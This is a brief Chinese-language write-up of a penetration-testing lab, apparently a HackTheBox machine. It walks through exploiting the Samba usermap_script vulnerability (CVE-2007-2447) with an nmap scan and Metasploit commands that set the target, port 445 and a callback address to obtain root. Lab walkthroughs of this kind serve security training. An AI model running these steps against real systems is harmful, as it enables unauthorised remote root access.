首先打开靶机，给了提示，说是cve-2007-2447，搜索这个漏洞编号后，发现是一个samba漏洞，名字叫usermap_script

使用nmap扫描一下看看，能发现确实是存在samba的。

nmap -sV -Pn -A 10.10.10.3

打开msf，然后搜索usermap_script

search usermap_script

然后使用第一个exploit

use 0

查看一下需要设置哪些东西

options

将远程地址设置为10.10.10.3，远程的端口设置为445(才开始用139，怎么都不成功)，本地的地址设置为openvpn拿到的地址

set rhosts 10.10.10.3
set rport 445
set lhost 10.10.14.30

启动，然后能找到root.txt

exploit